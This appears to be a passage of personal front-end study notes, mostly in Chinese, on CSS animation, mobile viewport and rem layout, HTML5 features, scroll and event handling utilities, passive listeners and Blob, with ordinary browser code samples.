animation-direction | Whether to play in reverse on alternate cycles: alternate alternates, reverse plays backwards
animation-fill-mode | Where the animation rests when a cycle ends: forwards stays at the end, backwards at the start
animation-play-state | Whether the animation is running or paused; e.g. add a hover rule to pause it

```css
@keyframes test {

}
```

#### ***HTML***

***Differences between link and @import***

- Ownership: `@import` is a syntax rule provided by CSS and can only import stylesheets; `link` is a tag provided by HTML and can load CSS files as well as define RSS feeds, rel link attributes, and so on.
- Load order: CSS referenced by `link` tags is loaded together with the page; CSS pulled in via `@import` is loaded after the page has finished loading.
- Compatibility: `@import` was introduced in CSS 2.1, so it is only recognized by IE5+; `link`, as an HTML element, has no compatibility problem.
- DOM control: you can insert a `link` tag via JS DOM manipulation to change styles; since DOM methods are document-based, there is no way to insert styles via `@import`.

***Differences between router-link and the a tag***

```js
const on = {
  click: (e) => {
    // ignore clicks with modifier keys held
    if (e.metaKey || e.ctrlKey || e.shiftKey) return
    // already prevented
    if (e.defaultPrevented) return
    // right click
    if (e.button !== 0) return
    // ignore `target="_blank"`
    const target = e.target.getAttribute('target')
    if (/\b_blank\b/i.test(target)) return
    // prevent the default behavior to stop the navigation
    e.preventDefault()
    if (this.replace) {
      // replace logic
      router.replace(to)
    } else {
      // push logic
      router.push(to)
    }
  }
}
```

***viewport***

First, a mobile browser assumes it must display every website correctly, even sites not designed for mobile devices. So how wide should its viewport be? Too narrow and layouts break; too wide and you get horizontal scrollbars. What counts as neither too narrow nor too wide?

Hence there are three viewports to solve these problems:

1. layout viewport (document.documentElement.clientWidth)
2. visual viewport (window.innerWidth)
3. ideal viewport (varies by device)

`document` is the document object, and its `documentElement` property returns the document's root element object; for an HTML document, that is the html element.

The layout viewport is a deliberately wide value that keeps layouts from breaking. Since its width is greater than the browser's visible area, we need another viewport to represent the visible area: the visual viewport. But more and more sites are designed specifically for mobile devices, and they need a viewport that fits the device perfectly: no zooming, no scrollbars, no display glitches. That viewport is the ideal viewport.

The ideal viewport is not one fixed size; different devices have different ideal viewports. Every iPhone's ideal viewport width is 320px regardless of whether its screen is 320 or 640 pixels wide; in other words, on an iPhone, 320px in CSS means the width of the screen. Android devices are messier: some are 320px, some 360px, some 384px, and so on; see [ideal viewports by device][androidViewportWidthSizeUrl].

***Controlling the viewport with meta***

A mobile device's default viewport is the layout viewport, the one wider than the screen, but when developing a mobile site we want the ideal viewport. How do we get it? This is where the meta tag comes in.

The meta viewport tag was first introduced by Apple in its Safari browser to solve the viewport problem on mobile devices; Android and the other browser vendors later followed suit and added support for it.

```html
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
```

This tag makes the current viewport as wide as the device (so the viewport width is the ideal viewport width) and forbids manual zooming by the user. Whether to allow zooming differs from site to site, but making the viewport match the device width is the effect everyone wants; without it you get the wider default viewport and a horizontal scrollbar.

**Note:** on iPhone and iPad, whether in portrait or landscape, the width is the portrait ideal viewport width.

```html
<meta name="viewport" content="width=device-width">
<meta name="viewport" content="initial-scale=1">
```

The two lines above have the same effect: each turns the current viewport into the ideal viewport. `initial-scale=1` simply means "do not scale the current page", but scaled relative to what? The answer is the `ideal viewport`: a scale of 1 relative to the ideal viewport is exactly the ideal viewport width.

What if both appear together, like this?

```html
<meta name="viewport" content="width=400, initial-scale=1">
```

The answer: the larger of the two wins. If the ideal viewport here is 480px, then 480px is used.

**Summary:** to set the current viewport width to the ideal viewport width, you can set either width=device-width or initial-scale=1, but each has a small flaw: with one, iPhone, iPad, and IE ignore orientation and always use the portrait ideal viewport width. So the most robust form is to write both: initial-scale=1 fixes the iPhone/iPad quirk, and width=device-width fixes IE (which does not honor initial-scale):

```html
<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
```

***On zooming and the default value of initial-scale***

We saw earlier that zooming is relative to the `ideal viewport`: the larger the scale, the narrower the current viewport. On an iPhone, whose ideal viewport is 320px wide, setting `initial-scale=2` makes the viewport only 160px wide. 160 sounds smaller than 320, but remember that px is a dynamic unit: after zooming 2x, 1px covers twice what it did before.

So: visual viewport width = ideal viewport width / current scale.

Most browsers follow this rule, but Android's stock browser and IE have problems. The Android stock WebKit browser only behaves correctly with initial-scale = 1 and no width attribute set, so the rule is basically useless on it; and IE completely ignores initial-scale: whatever you set, it always behaves as if the scale were 1.

Now, what is the default value of initial-scale when the attribute is omitted? Clearly not 1: with initial-scale = 1, the current layout viewport width becomes the ideal viewport width, but as noted above, the browsers' default layout viewport widths are values like 980, 1024, or 800, never the ideal viewport width from the start, so the default cannot be 1.

**Conclusion:** on iPhone and iPad, whatever viewport width you set, if no default scale is specified they compute one automatically so that the page has no horizontal scrollbar (that is, so the viewport width equals the screen width).

Finally, here is how Taobao computes the scale for different devices (it mainly targets iPhone; on Android the value stays 1):

```js
var dpr = 0;
var scale = 0;
var match = document.querySelector('meta[name="viewport"]').getAttribute('content').match(/initial\-scale=([\d\.]+)/)
if (match) {
  // regex capture group: match[1] is the scale, e.g. 1
  scale = parseFloat(match[1]);
  // if scale is greater than 1, dpr becomes 0
  dpr = parseInt(1 / scale);
}
if (!dpr && !scale) {
  var isAndroid = win.navigator.appVersion.match(/android/gi);
  var isIPhone = win.navigator.appVersion.match(/iphone/gi);
  var devicePixelRatio = win.devicePixelRatio;
  if (isIPhone) {
    // on iOS, use the 2x scheme for 2x and 3x screens, and the 1x scheme otherwise
    if (devicePixelRatio >= 3 && (!dpr || dpr >= 3)) {
      dpr = 3;
    } else if (devicePixelRatio >= 2 && (!dpr || dpr >= 2)){
      dpr = 2;
    } else {
      dpr = 1;
    }
  } else {
    //
其他设备下,仍旧使用1倍的方案 dpr = 1; } scale = 1 / dpr; } var doc = win.document; var docEl = doc.documentElement; docEl.setAttribute('data-dpr', dpr); if (!metaEl) { metaEl = doc.createElement('meta'); metaEl.setAttribute('name', 'viewport'); metaEl.setAttribute('content', 'initial-scale=' + scale + ', maximum-scale=' + scale + ', minimum-scale=' + scale + ', user-scalable=no'); if (docEl.firstElementChild) { docEl.firstElementChild.appendChild(metaEl); } else { var wrap = doc.createElement('div'); wrap.appendChild(metaEl); doc.write(wrap.innerHTML); } } ``` 在高分屏下,dpr越大,scale越小。。。由公式:visual viewport宽度 = ideal viewport宽度 / 当前缩放值,可以得到visual viewport越大,这样便和设计稿尺寸吻合了,同一个图片在不同手机上看着就大小一样了。。。比如iphone6, ideal viewport宽度为320px,dpr为2,所以scale为0.5,visual port 就为320/0.5 = 640px,也就是设计稿的宽度,但为何设计稿的宽度都为750px呢? 参考:[淘宝具体实现flexible过程][taoBaoFlexibleUrl] ***rem思想:*** 这种方案受到vw这个单位的启发,100vw等于设备宽度,跟具体像素无关,有点类似100%。但百分比无法解决宽高比的问题。 rem单位是参照根节点的font-size为依据,所以只要根据设备宽度来除以100份,动态计算根节点的字体大小,就能hack这个vw的效果。 `1vw = (ClietWidth/100) = htmlFontSize = 1rem` flexible将页面分成了10份,为什么不像vw单位一样是100份呢?拿iPhone4举例,宽度为320px,如果是100份,1rem=3.2px,目前大部分浏览器不支持12px以下的字体大小,所以320/12=26.67,最多可以将页面分成26份,方便计算取整数10,1rem=(320/10)=32px。 ***rem布局*** ```js (function (doc, win) { var docEl = doc.documentElement, resizeEvt = 'orientationchange' in window ? 
'orientationchange' : 'resize', recalc = function () { var clientWidth = docEl.clientWidth; if (!clientWidth) return; let array = navigator.userAgent.split("&"); // 还可以处理各个的兼容,比如华为P20手机兼容 if(navigator.userAgent.indexOf("HUAWEIEML-AL00") >= 0 && array.length >=2){ clientWidth = 313; } // 屏幕宽为750px时,1rem = 100px; // iphone8屏幕宽为375px,1rem = 50px; // 而我们公司的设计稿就是按750px的尺寸做的,因此可以直接转换 // 比如 10px 就是 0.1rem docEl.style.fontSize = 100 * (clientWidth / 750) + 'px'; }; if (!doc.addEventListener) return; win.addEventListener(resizeEvt, recalc, false); doc.addEventListener('DOMContentLoaded', recalc, false); })(document, window); // 移动端时,在input或textarea获取焦点后,一般会软键盘弹起 // 为了防止软键盘挡住input或textarea,可以设置input或textarea自动滚动到可视区域 if ( isMobile ) { if ( ios_version.length > 1 && parseInt( ios_version[ 0 ] ) >= 11 ) { //ios 11 以上先不执行 } else { document.body.addEventListener( 'click', function ( event ) { var element = event.target; var tags = { 'INPUT': 1, 'TEXTAREA': 1, }; if ( ( element.tagName in tags ) ) { setTimeout( function () { // 将不在浏览器窗口的可见区域内的元素滚动到浏览器窗口的可见区域。 // 如果该元素已经在浏览器窗口的可见区域内,则不会发生滚动。 element.scrollIntoViewIfNeeded(); }, 400 ); } }, false ); } // ios机型上,由于软键盘弹起造成界面整体上移,软键盘收起时又没有及时拉回,导致点击按钮失效, ;(/iphone|ipod|ipad/i.test(navigator.appVersion)) && document.addEventListener('blur', (e) => { // 这里加了个类型判断,因为a等元素也会触发blur事件 // scrollIntoView(false),false表示元素的底端将和其所在滚动区的可视区域的底端对齐 ['input', 'textarea'].includes(e.target.localName) && document.body.scrollIntoView(false) }, true) ``` Chrome排版引擎现在是blink,这一点从哪里可以看到呢?我在76版本Chrome的navigator属性值里只看到了AppleWebkit,这是为什么? 
UserAgent,又称为UA,是浏览器的身份证。通常,在发送HTTP请求时,UA会附带在HTTP请求头的user-agent字段中,这样服务器就会知道浏览器的基础信息,然后服务器会根据不同的UA返回不同的页面内容,比如手机上返回手机的样式,PC就返回PC的样式。

服务器会根据不同的UA来针对性地设计不同页面,所以当出了一款新浏览器时,如果他使用自己独一无二的UA,那么之前的很多服务器还需要针对他来做页面适配,这显然是不可能的。比如Chrome发布时会在他的UA中使用"Mozilla"、"AppleWebKit"等关键字段,用来表示他同时兼容Mozilla和AppleWebKit,然后再在最后加上他自己的标示,如Chrome/xxx。

UserAgent构成:https://www.jianshu.com/p/c5cf6a1967d1
UserAgent解析:https://www.jianshu.com/p/2f99f007dc14

***常见html问题点***

```js
// charset是定义的外部脚本文件中所使用的字符编码
// type规定脚本的MIME类型,媒介类型/子类型
// html5规范中,现代浏览器默认的脚本就是javascript,所以如果标签内是js可以省略,但是如果不是js就需要添加
<script type="text/javascript" src="myscripts.js" charset="UTF-8"></script>
```

其实:MIME是多用途Internet邮件扩展(Multipurpose Internet Mail Extensions)类型,由类型与子类型两个字符串,中间用'/'分割而组成,不允许空格。

语法结构:type/subtype

1. text 表明文件是普通文本,理论上是人类可读,text/plain, text/html, text/css, text/javascript
2. image 表明是某种图像。不包括视频,但是动态图(比如动态gif)也使用image类型 image/gif, image/png, image/jpeg, image/bmp, image/webp, image/x-icon, image/vnd.microsoft.icon
3. audio 表明是某种音频文件,audio/midi, audio/mpeg, audio/webm, audio/ogg, audio/wav
4. video 表明是某种视频文件,video/webm, video/ogg
5.
application 表明是某种二进制数据 application/octet-stream, application/pkcs12, application/vnd.mspowerpoint, application/xhtml+xml, application/xml, application/pdf 上面是对立类型,其实还有Multipart类型,如`multipart/form-data` `multipart/byteranges`等。Multipart 类型表示细分领域的文件类型的种类,经常对应不同的 MIME 类型。这是复合文件的一种表现方式。multipart/form-data 可用于联系 HTML Forms 和 POST 方法, ***常用布局方式*** **flex:** 采用flex布局的元素,自动称为felx容器(flex contanier),而所有的子元素自动称为容器成员(flex item) - flex-direction 伸缩流方向 `(row横(默认值) | row-reverse | column |column-reverse)` - flex-wrap 伸缩-换行 `(nowrap(默认值) | wrap | wrap-reverse)` - justify-content 主轴对齐及空间分配 `(flex-start(默认值) | flex-end | center |space-between | space-around | space-evenly)` - align-items 侧轴上项目对齐方式 `(stretch(默认值) | center | flex-end | baseline | flex-start)` - align-content 堆栈伸缩行 `(stretch(默认值) | flex-start | center |flex-end | space-between | space-around | space-evenly)` - align-self 侧轴上单个项目对齐方式 - flex 伸缩性 - flex-basis 伸缩-基准值 - flex-flow伸缩流的方向与换行 - flex-grow伸缩-扩展基数 - flex-shrink 伸缩-收缩比率 - order 伸缩-顺序 ```js // flex实现table高度自适应 // 比如页面里有两个部分,头部和table,要求table高度自适应 // 可以对父元素设置如下(注意height:100%需要显式指定): display:flex; flex-direction:column; height:100%; // 然后table元素设置如下: flex: 1; // 其实就是按比例自适应填满剩余空间 // 当然还有种方式,就是利用ccs变量 // 头部高度计算出来,然后table的高度:calc(100% - var(--topHeight)) ``` #### ***CSS相关*** ***css权重*** ```js // !important > 行内样式 > ID选择器 > 类选择器 | 属性选择器 | 伪类选择器 > 元素选择器 ``` ***margin collapsing*** **块级元素**的**上外边距和下外边距**有时会合并(或折叠)为一个外边距,其**大小取其中大者**,可理解为外边距折叠或外边距合并,**浮动元素和绝对定位元素的外边距不会折叠** 几种折叠场景: 1. 相邻元素之间(除非后面的元素清除之前的浮动) 2. 父元素与其第一个或最后一个子元素之间 3. 空的块级元素 其实说到底,只要margin-bottom和margin-top之间没有**一些东西**隔开,就会发生合并。。。而这里的**一些东西**可以是:边框、内边距、行内内容、height、min-height 等。 参考:[margin合并(mdn)][marginCollapsingUrl] ***一些css技巧*** 参考:[css常用选择器(w3c)][w3choolCssSelectorUrl] ```css /* 同时选中在(父元素的)子元素列表中,最后一个给定类型的元素p和a元素 */ p, a:last-of-type { margin-bottom: 0; } ``` #### ***HTML5及CSS3相关*** 参考:[HTML5(mdn)][html5MdnUrl]、[h5和css3新特性一览][html5&css3NewFeatureUrl]、[前端工程师手册][frontEndDatabaseUrl] **HTML5**: 1. 
一个新版本的html语言,具有新的元素,属性和行为 2. 有更大的技术集,允许更多多样化和强大的网站和应用程序。 主要改变有以下几个方面: 1. 语义 2. 通信 3. 离线 & 存储 4. 多媒体 5. 2d/3d 图形和效果 6. 性能和集成 7. 设备访问 8. 样式设计 **语义**: 1. 语义之新区块和段落元素`<section>, <article>, <nav>, <header>, <footer>, <aside> 和 <hgroup>.`能让你更恰当地描述你的内容是什么 2. `<audio> 和 <video> `元素嵌入和允许操作新的多媒体内容。 3. 表单改进,强制校验API,一些新的属性,一些新的`<input>` 元素type属性值(`placeholder,required,pattern,min,max,step,autofocus,multiple`) ,新的`<output>`元素。 4. 新的语义元素,除了上面的,还有例如` <mark>, <figure>, <figcaption>, <data>, <time>, <output>, <progress>, 或者 <meter>和<main>`,这增加了有效的 HTML5 元素的数量。 **什么是语义化?就是用合理、正确的标签来展示内容,比如h1~h6定义标题。** - 易于用户阅读,样式丢失的时候能让页面呈现清晰的结构。 - 有利于SEO,搜索引擎根据标签来确定上下文和各个关键字的权重。 - 方便其他设备解析,如盲人阅读器根据语义渲染网页 - 有利于开发和维护,语义化更具可读性,代码更好维护,与CSS3关系更和谐。 - 用户体验:例如title、alt用于解释名词或解释图片信息、label标签的活用; **通信**: 1. `webSocket`是h5开始提供的一种在单个tcp连接上进行全双工通讯的协议; 2. `WebRTC`即时通信,允许连接到其他人,直接在浏览器中控制视频会议,而不需要一个插件或是外部的应用程序。 3. `Server-sent events(SSE)`允许服务器向客户端推送事件,而不是仅在响应客户端请求时服务器才能发送数据的传统范式。 **离线 & 存储**: 参考:[indexedDB(阮一峰)][indexedDB(ruanyifeng)] 1. 离线资源(应用程序缓存),火狐全面支持离线资源规范,其他浏览器部分支持、 2. Firefox 3 支持 WHATWG 在线和离线事件,这可以让应用程序和扩展检测是否存在可用的网络连接,以及在连接建立和断开时能感知到。 3. Web Storage存储(sessionStorage,localStorage)让web应用程序在客户端存储结构化数据 4. indexedDB在浏览器中存储大量结构化数据,并且能够在这些数据上使用索引进行高性能检索 ***注意:*** 1. window.sessionStorage是会话期间(关闭标签会话即结束(vue项目测试的),刷新后也有效) 2. LocalStorage 在 2.5MB 到 10MB 之间(各家浏览器不同),而且不提供搜索功能,不能建立自定义的索引。 3. Cookie的大小不超过4kb,且每次请求都会发送回服务器,浏览器不同,每个域下cookie的数量20个左右 4. IndexedDB 不属于关系型数据库(不支持 SQL 查询语句),更接近 NoSQL,MongoDB等非关系型数据库。 5. 关系型是指采用关系模型(二维表格模型)组织数据的数据库,具有事务一致性(任何人看到的数据都一致),也因此读写性能稍差 6. 非关系型大多开源,大多以键值对存储,且结构不固定,每一个元组可以有不一样的字段,每个元组可以根据需要增加一些自己的键值对,这样就不会局限于固定的结构,可以减少一些时间和空间的开销。 **多媒体**: 1. `<audio> 和 <video> `元素嵌入并支持新的多媒体内容的操作。 2. 
使用 Camera API,允许使用,操作计算机摄像头,并从中存储图像。 **媒体类型(Media type)** 媒体类型是一个常见的属性,可以通过媒体类型对不同的设备指定不同的样式。 常见的几种:link标签、xml方式、@import方式、@media方式 ```html <link rel="stylesheet" type="text/css" href="style.css" media="screen"/> @media screen {} @media screen and (max-width:600px) {} <!-- 根据设备屏幕的输出宽度设置相应的样式 --> <link rel="stylesheet" media="screen and (max-device-width:480px)" href="iphone.css"/> ``` **2d/3d 图形和效果**: 1. canvas 2. WebGL 通过引入了一套非常地符合 OpenGL ES 2.0 并且可以用在 `HTML5<canvas>`元素中的 API 给 Web 带来了 3D 图像功能。 3. 一个基于 XML(Extensible Markup Language,可扩展标记语言,设计之初用来传输和存储数据,而html用来显示数据) 的可以直接嵌入到 HTML 中的矢量图像格式。 **XML 、 HTML 、XHTML** 通常把通过添加标签为数据赋予意义的行为称为“标记”。为这种 给数据赋予意义的行为定义规则的语言就是“标记语言” - 在 HTML 中,我们只能使用由 HTML 定义出的那若干种标签, 因此 HTML 是固定的标记语言。但XML 的使用者随心所欲地创建标签。 也就是说,在“<”和“>”中的单词可以是任意的 - XML 并没有限定标签的使用方式,使用什么样的标签都可以。可 以说 XML 仅仅限定了进行标记时标签的书写格式(书写风格)。也就 是说通过定义要使用的标签种类,就可以创造出一门新的标记语言。 **通常把这种用于创造语言的语言称作“元语言”**。例如,我们可以使用 <dog> 和 <cat> 等标签,创造一种属于自己的标记语言——宠物语言 - HTML 中规定的各种标签只能用来指定信息的呈现样式,而不能表示信息的含义。 有效的 XML 文档包含3部分: - XML 声明 ,XML 文档开 头的、形如 `<?xml version="1.0" encoding="Shift_JIS"?>` 的部分 - XML 实例,文档中通过标签被标记的部分 - DTD (Document Type Definition,文档类型描述),而 DTD 的作用是定义 XML 实 例的结构。虽然也可以省略 DTD,但是通过 DTD 可以严格地检查 XML 实例的内容是否有效。 处理 XML 文档的程序组件,比如已成为 W3C 标 准的 DOM(Document Object Model,文档对象模型)以及由 XML-dev 社区开发的 SAX(Simple API for XML)。其实无论是 DOM 还是 SAX,都只是组件的规范,实际的组件是由某个厂商或社区提供的。如果使用的是 Windows,那么就应该已经安装了一个由微软提供 的、遵循了 DOM 规范的组件(一个名为 msxml3.dll 的 DLL 文件)。 **性能和集成**: 1. web workers可以把js运算委托给后台线程,通过允许这些活动以防止使交互型事件变得缓慢 2. 即时编译的js引擎功能更加强大,性能更杰出 3. History API允许对浏览器历史记录进行操作 4. contentEditable 属性:把你的网站改变成 wiki ! 5. 拖放,HTML5 的拖放 API 能够支持在网站内部和网站之间拖放项目。 6. requestAnimationFrame下次重绘之前调用指定的回调函数更新动画以获得更优性能 7. 全屏API,选择全屏展示的元素(如:video,html等),调用Ele.requestFullscreen() 8. 在线和离线事件,navigator.onLine为true表示在线,否则离线 ```js // 1. 时间间隔并不好拿捏,设置太短浏览器重绘频率太快会产生性能问题,太慢的话又显得像PPT不够平滑,业界推荐的时间间隔是16.66...(显示器刷新频率是60Hz,1000ms/60) // 2. 
浏览器UI线程堵塞问题,如果UI线程之中有很多待完成的渲染任务,所要执行的动画就会被搁置。 // 模拟requestAnimationFrame let lastTime = 0; if ( !window.requestAnimationFrame ) { window.requestAnimationFrame = function ( callback, element ) { var currTime = new Date().getTime(); var timeToCall = Math.max( 0, 16 - ( currTime - lastTime ) ); var id = window.setTimeout( function () { callback( currTime + timeToCall ); }, timeToCall ); lastTime = currTime + timeToCall; return id; }; } // 浏览器自动 var start = null; var element = document.getElementById('SomeElementYouWantToAnimate'); // element.style.position = 'absolute'; function step(timestamp) { if (!start) start = timestamp; var progress = timestamp - start; element.style.left = Math.min(progress / 10, 200) + 'px'; if (progress < 2000) { window.requestAnimationFrame(step); } } // 利用浏览器的刷新频率自动执行step函数,其实相当于定时器 window.requestAnimationFrame(step); ``` **设备访问**: 1. 使用 Camera API,允许使用,操作计算机摄像头,并从中存储图像。 2. 对于用户按下触控屏的事件作出反应的处理程序 3. 地理位置定位navigator.geolocationt对象提供,返回低精度位置 ```js // getCurrentPosition是异步操作,回调函数对返回的数据进行处理 navigator.geolocation.getCurrentPosition(function(position) { do_something(position.coords.latitude, position.coords.longitude); }); ``` 1. 检测设备方向。 ```js // DeviceOrientationEvent是加速度传感器检测到设备在方向上发生变化时触发 window.addEventListener("deviceorientation", handleOrientation, true); // DeviceMotionEvent是监听的加速度变化而不是方向 window.addEventListener("devicemotion", handleMotion, true); ``` **样式设计**: 1. `box-shadow`设置边框阴影,还可以设置多背景 2. `border-image`边框图片,`border-radius`设置圆角 3. css Transitions/Transform/@keyframes 4. @font-face规则自定义字体,多个src确保支持多种浏览器 5. 
多栏布局及css灵活方框布局 ***主流浏览器兼容性*** - 各浏览器默认样式不同(可用Normalize.css抹平,或margin:0;padding:0但误伤较多) - ie9以下不识别HTML5标签(可用条件注释引入html5shiv.js) ```html <!-- 注意:条件注释只适用于IE --> <!-- lt小于、gt大于、lte小于等于、gte大于等于、!不等于 --> <!--[if lt IE 9]> <script type="text/javascript" src="https://cdn.bootcss.com/html5shiv/3.7.3/html5shiv.min.js"></script> <![endif]--> ``` - 浏览器css兼容前缀(o(Opera)、ms(IE)、moz(Firefox)、webkit(Chrome、Safari、新版Opera)) - 页面滚动高度,二者只会同时有一个有值 ```js // 获取窗体的高度 var windowHeight = window.innerHeight // 前者主要兼容pc端,后者主要针对移动端 var scroll_Top = document.documentElement.scrollTop || document.body.scrollTop; // scrollingElement 新标准,标准模式下返回document.documentElement // 怪异模式下,返回body,因此可以不用再像上面写两个了(注意兼容) // 在ie9之后的浏览器(pc及移动),垂直方向的偏移 var ie_scroll_top = window.pageYOffset // 获取元素高度:clientHeight不包括边框 // offsetHeight包括边框且获取的是整数位,还有ele.getBoundingClientRect().height这个可以精确到小数位,都兼容ie6+ // 获取元素滚动高度:scrollTop即可 // 精确获取页面元素位置的方式getBoundingClientRect(),它返回一个对象,其中包含了left、right、top、bottom四个属性,分别对应了该元素的左上角和右下角相对于浏览器窗口(viewport)左上角的距离。 // 判断页面滚动到底部 window.addEventListener('scroll', () => { // 滚动条在Y轴上的滚动距离 var scrollTop = document.documentElement.scrollTop || document.body.scrollTop; // 文档的总高度 var scrollHeight = document.documentElement.scrollHeight || document.body.scrollHeight; // 浏览器视口的高度 var clientHeight = document.documentElement.clientHeight || document.body.clientHeight; // 以上都用了两种, 其实可以直接使用document.scrollingElement // 滚动距离+窗口高度 == 文档的总高度 if(scrollTop + clientHeight == scrollHeight){ console.log('到底部了') } }) // 元素滚动到页面的指定位置, // 首先需要根据e.target找到滚动的元素,然后用该元素调用scrollTo(xpos,ypos) // 有个库Scrollparent,专门用来找滚动元素,但效果待验证。。。 // 原理:找到传入的元素的祖先元素,然后判断祖先元素的overflow相关的属性值,若属性值包含auto或scroll就为滚动元素。 // 当前的元素滚动到浏览器窗口的可视区域内。 Element.scrollIntoView() // 参数有三种方式 element.scrollIntoView(); // 等同于element.scrollIntoView(true) element.scrollIntoView(alignToTop); // Boolean型参数 element.scrollIntoView(scrollIntoViewOptions); // Object型参数 // 如果为true,元素的顶端将和其所在滚动区的可视区域的顶端对齐。 相应的 scrollIntoViewOptions: {block: "start", inline: 
"nearest"}。这是这个参数的默认值。 // 如果为false,元素的底端将和其所在滚动区的可视区域的底端对齐。相应的scrollIntoViewOptions: {block: "end", inline: "nearest"}。 // scrollIntoViewOptions包含三个选项: // behavior,定义动画过渡效果, "auto"或 "smooth" 之一。默认为 "auto"。 // block,定义垂直方向的对齐, "start", "center", "end", 或 "nearest"之一。默认为 "start"。 // inline,定义水平方向的对齐, "start", "center", "end", 或 "nearest"之一。默认为 "nearest"。 // 一般项目里直接,使用如下即可 Element.scrollIntoView({ behavior: 'smooth' }) // 下拉刷新 // 1. 当前手势滑动位置与初始位置差值大于零时,提示正在进行下拉刷新操作; // 2. 下拉到一定值时,显示松手释放后的操作提示; // 3. 下拉到达设定最大值松手时,执行回调,提示正在进行更新操作。 ( function ( window ) { var _element = document.getElementById( 'refreshContainer' ), _refreshText = document.querySelector( '.refreshText' ), _startPos = 0, _transitionHeight = 0; _element.addEventListener( 'touchstart', function ( e ) { console.log( '初始位置:', e.touches[ 0 ].pageY ); _startPos = e.touches[ 0 ].pageY; _element.style.position = 'relative'; _element.style.transition = 'transform 0s'; }, false ); _element.addEventListener( 'touchmove', function ( e ) { console.log( '当前位置:', e.touches[ 0 ].pageY ); _transitionHeight = e.touches[ 0 ].pageY - _startPos; if ( _transitionHeight > 0 && _transitionHeight < 60 ) { _refreshText.innerText = '下拉刷新'; _element.style.transform = 'translateY(' + _transitionHeight + 'px)'; if ( _transitionHeight > 55 ) { _refreshText.innerText = '释放更新'; } } }, false ); _element.addEventListener( 'touchend', function ( e ) { _element.style.transition = 'transform 0.5s ease 1s'; _element.style.transform = 'translateY(0px)'; _refreshText.innerText = '更新中...'; // todo... 
}, false );
} )( window );
// e.screenX 是鼠标距离物理屏幕左边缘的距离
// e.clientX 是鼠标距离页面左边缘的距离
```

- 绑定事件/移除事件/阻止默认事件/阻止冒泡/消除滚动及滚轮事件

```js
// 给窗体绑定滚动事件,直接给window添加就行(document有兼容,body及documentElement不反应)
window.addEventListener('scroll', function(){
  console.log('window滚动了') // 有效
});
document.addEventListener("scroll", function(){
  console.log("document滚动了") // 有效
});
document.body.addEventListener("scroll", function(){
  console.log("body滚动了") // 无效
});
document.documentElement.addEventListener("scroll", function(){
  console.log("html滚动了") // 无效
});
// 注意上面各语句末尾要加分号,否则下一行以 [ 开头会被ASI当成取下标
[document, window, document.documentElement, document.body].forEach(function(item){
  item.addEventListener('scroll', function(){
    console.log(`${item} 滚动了`)
  })
});

// 封装成一个工具对象(名字随意)
var eventUtil = {
  // 添加事件句柄
  addHandler: function(elem, type, listener) {
    if (elem.addEventListener) {
      elem.addEventListener(type, listener, false);
    } else if (elem.attachEvent) {
      elem.attachEvent('on' + type, listener);
    } else {
      // 在这里由于.与'on'字符串不能链接,只能用 []
      elem['on' + type] = listener;
    }
  },
  // 移除事件句柄
  removeHandler: function(elem, type, listener) {
    if (elem.removeEventListener) {
      elem.removeEventListener(type, listener, false);
    } else if (elem.detachEvent) {
      elem.detachEvent('on' + type, listener);
    } else {
      elem['on' + type] = null;
    }
  },
  // 取消默认行为
  preventDefault: function(event) {
    if (event.preventDefault) {
      event.preventDefault();
    } else {
      event.returnValue = false;
    }
  },
  // 阻止事件冒泡
  stopPropagation: function(event) {
    if (event.stopPropagation) {
      event.stopPropagation();
    } else {
      event.cancelBubble = true;
    }
  },
  // 阻止滚动及滚轮事件
  stopScrollAndMousewheel: function(){
    ['scroll','mousewheel'].forEach((item) => {
      window.addEventListener(item, (e) => {
        e.preventDefault && e.preventDefault();
        e.returnValue = false; // 已废除(但有旧浏览器支持),用e.preventDefault()代替
        e.stopPropagation && e.stopPropagation();
        return false;
      })
    })
  },
};
```

***passive特性***
Web开发者通过一个新的属性passive来告诉浏览器,当前页面内注册的事件监听器内部是否会调用preventDefault函数来阻止事件的默认行为,以便浏览器根据这个信息更好地做出决策来优化页面性能。当属性passive的值为true的时候,代表该监听器内部不会调用preventDefault函数来阻止默认滑动行为,Chrome浏览器称这类型的监听器为被动(passive)监听器。 addEventListener可以传递第三个参数{passive: true},它表示 listener 永远不会调用 preventDefault()。如果 listener 仍然调用了这个函数,客户端将会忽略它并抛出一个控制台警告。 其实就是告诉浏览器,我的事件里不会调用preventDefault,你就大胆滚动就好了。即使调用了,也不会阻断程序运行。但这个特性还不能完全兼容,需要配合下面的polyfill,对于不支持的浏览器,传false(冒泡阶段触发,默认值)或true即可。 ```js // Test via a getter in the options object to see // if the passive property is accessed // supportsPassive.js export let supportsPassive = false if (typeof window !== 'undefined') { supportsPassive = false try { var opts = Object.defineProperty({}, 'passive', { get () { supportsPassive = true }, }) window.addEventListener('test', null, opts) } catch (e) {} } // Use our detect's results. // passive applied if supported, capture will be false either way. import { supportsPassive } from './supportsPassive'; elem.addEventListener( 'scroll', fn, supportsPassive ? 
{ passive: true } : false );
```

***blob***

二进制大对象接口(Blob)属于 HTML5 的 File API,就像一个不透明的引用,可以指向任何数据块(二进制或文本)。这个对象本身没有太多功能,只能查询其大小、MIME 类型,或将它切分成更小的块。这个对象存在的真正目的,是作为各种 JavaScript API 之间的一种高效的互操作机制。

js本身是没有处理二进制的能力的,但是可以通过js中的`ArrayBuffer和 Blob`来达到操作二进制的目的。

Blob 对象一般代表一个不可变的文件对象或原始数据。如果你不需要修改它或者不需要把它切分成更小的块,那这种格式是理想的(比如,可以把一个完整的 Blob 对象传给 img 标签,参见 15.3 节"通过 XHR 下载数据")。而如果你还需要再处理接收到的二进制数据,那么选择 ArrayBuffer 应该更合适。

ArrayBuffer 表示一个普通的、固定长度的二进制数据缓冲。Blob 对象表示一个不可变、原始数据的类文件对象。**Blob 表示的不一定是JavaScript原生格式的数据。File 接口基于Blob,继承了 blob 的功能并将其扩展使其支持用户系统上的文件**。

`Blob,Binary Large Object`的缩写,代表二进制类型的大对象。在Web中,Blob类型的对象表示不可变的类似文件对象的原始数据,通俗点说,就是**Blob对象是二进制数据,但它是类似文件对象的二进制数据**,因此**可以像操作File对象一样操作Blob对象,实际上,File继承自Blob**。

```js
// 返回一个新创建的 Blob 对象,其内容由参数中给定的数组串联组成
Blob(blobParts[, options])
// 参数blobParts,数组类型, 数组中的每一项连接起来构成Blob对象的数据,
// 数组中的每项元素可以是ArrayBuffer(二进制数据缓冲区), ArrayBufferView,Blob,DOMString。或其他类似对象的混合体。
